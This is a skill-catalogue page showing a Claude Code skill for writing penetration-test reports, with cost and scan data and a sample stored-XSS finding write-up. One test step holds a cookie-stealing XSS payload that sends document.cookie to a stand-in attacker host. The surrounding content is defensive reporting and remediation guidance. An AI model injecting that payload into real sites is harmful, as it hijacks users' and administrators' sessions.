Borrowing it
Nothing to install: this file belongs to fatihkan/badi. Take a copy, put it at the same path in your own repository, and replace the rules that are about this project with yours.
curl -O https://raw.githubusercontent.com/fatihkan/badi/main/.claude/skills-vault/pentest-report/SKILL.mdgit clone --depth 1 https://github.com/fatihkan/badiWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/fatihkan/badi/pentest-report)<a href="https://agentmods.dev/skills/fatihkan/badi/pentest-report"><img src="https://agentmods.dev/badge/skills/fatihkan/badi/pentest-report.svg" alt="Measured on agentmods" height="20"></a>- NVIDIA SkillSpector pass
What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00054 | $0.01624 |
| Opus 5 | $0.00027 | $0.00812 |
| Sonnet 5 | $0.00011 | $0.00325 |
| Haiku 4.5 | $0.00005 | $0.00162 |
Grade A, and why
pentest-report scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured yesterday.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Nothing flagged
None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.
How it starts
The opening of the file, as written. The whole thing — 189 lines — stays where its author put it; the contents beside it link to each section on GitHub.
pentest-report
Pentest report writing. The final deliverable after the engagement.
Triggers
- "write a pentest report"
- "executive summary"
- "technical writeup"
- "compute a CVSS score"
- "remediation roadmap"
- "retest report"
Report Structure
1. Cover Page
2. Executive Summary (1-2 pages, non-technical)
3. Scope + Methodology (1 page)
4. Risk Matrix + Summary Findings Table
5. Detailed Findings (1-2 pages per finding)
6. Remediation Roadmap
7. Appendix (tool list, sample evidence, retest plan)
Executive Summary Template
# Executive Summary
The <pentest type> test authorized by [Company Name] was conducted by
[pentest firm name] over [date range]. <X> assets within the test scope
were examined: [short scope summary].
## Key Findings
A total of <N> findings were identified:
- **<X> Critical** — immediate action required
- **<X> High** — must be fixed within 30 days
- **<X> Medium** — 90 days
- **<X> Low** — best effort
Most serious finding: <short finding description>. This vulnerability poses a [business impact: client data
disclosure / financial loss / regulatory violation] risk.
## Overall Security Measurement
[Company Name]'s overall security maturity level was rated as
<Initial/Repeatable/Defined/Managed/Optimizing>. Compared with the prior-year baseline:
<improving / stable / degraded>.
## Strategic Recommendations
1. <Remediation for the critical finding>
2. <Process / culture recommendation: incident response drill, awareness training>
3. <Investment recommendation: SIEM coverage, MFA universal>
## Acceptance
This report was delivered as of [date]. The findings are opened for retest
on [date + 7 days].
Finding Template
## [BLG-001] Stored XSS in Comment Field — CRITICAL
### CVSS 3.1
**9.0 (Critical)** — `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N`
### Impact
Authenticated low-priv user can inject persistent JavaScript that executes
in admin browsers, leading to:
- Full admin session hijack
- Persistent malicious payload (persistent DB record)
- 1-click via existing workflow (admin moderator panel)
### Test Steps
1. Login: [email protected] / Test123! (low priv)
2. Navigate: /comments
3. Submit: `<img src=x onerror="fetch('https://evil.tld/?c='+document.cookie)">`
4. Wait: the payload triggers when the admin opens the moderator review panel
5. Confirm: the cookie is delivered to the attacker server
### Evidence
- `evidence/blg-001-payload.png` (HAR file attached)
- `evidence/blg-001-cookie-exfil.png`
- `evidence/blg-001-admin-impact.mp4` (60s video)
### Affected Component
- File: `src/components/Comment.tsx:42`
- Component: CommentRenderer.render
- Endpoint: POST /api/comments
### Root Cause
Server-side comment body sanitization is missing. The frontend renders it directly
with `dangerouslySetInnerHTML`.
### Suggested Fix
**Quick fix (1 day)**: Server-side sanitization
```javascript
// src/api/comments.js
import DOMPurify from 'isomorphic-dompurify';
const cleanBody = DOMPurify.sanitize(req.body.body, { ALLOWED_TAGS: ['b','i','em'] });
Long-term (1 week):
- Content Security Policy header:
default-src 'self'; script-src 'self' 'nonce-{random}' - Cookie flag: HttpOnly + Secure + SameSite=Strict
- Code review checklist: dangerouslySetInnerHTML usage approval
Verification
Submit the same payload during the retest -> it must be sanitized, not executed.
CWE / MITRE
- CWE-79: Improper Neutralization of Input (Cross-Site Scripting)
- MITRE: T1059.007 (Command and Scripting Interpreter: JavaScript)
Reference
- OWASP XSS Prevention Cheatsheet
- HackerOne similar finding
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- yesterday First seen · 189 lines · 54 tokens per session scan A a2c0992aefa8
pentest-report is a skill published in the GitHub repository fatihkan/badi (7 stars, last pushed today), licensed MIT. It adds 54 tokens to every session and 1,624 once invoked, about $0.0003 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-09-06.
Other skills, from other repositories
pr-triage
4-phase PR backlog management with audit, deep code review, validated comments, and optional worktree setup. Use when triaging pull requests, catching up on pending code reviews, or managing a backlog of open PRs. Args: 'all' to review all, PR numbers to focus (e.g. '42 57'), 'en'/'fr' for language, no arg = audit…
audit-agents-skills
Audit Claude Code agents, skills, and commands for quality and production readiness. Use when evaluating skill quality, checking production readiness scores, or comparing agents against best-practice templates.
eval-agents
Audit Claude Code agents defined in .claude/agents/ for description specificity, model tier appropriateness, tools scoping, and system prompt quality. Detects dispatch ambiguity between agents, flags over-permissive tool grants, and checks for human-in-the-loop patterns that break programmatic orchestration. Use when…
issue-triage
3-phase issue backlog management with audit, deep analysis, and validated triage actions. Use when triaging GitHub issues, sorting bug reports, cleaning up stale tickets, or detecting duplicate issues. Args: 'all' to analyze all, issue numbers to focus (e.g. '42 57'), 'en'/'fr' for language, no arg = audit only.
check-cache-bugs
Audit Claude Code setup for cache bugs (CC#40524): sentinel, --resume/--continue, attribution header + ArkNill B3/B4/B5.
git-ai-archaeology
Analyze AI config evolution in a git repo. Use when mapping AI adoption history, finding when configs were first introduced, charting commit velocity by month, or identifying maturity phases in a project's AI tooling.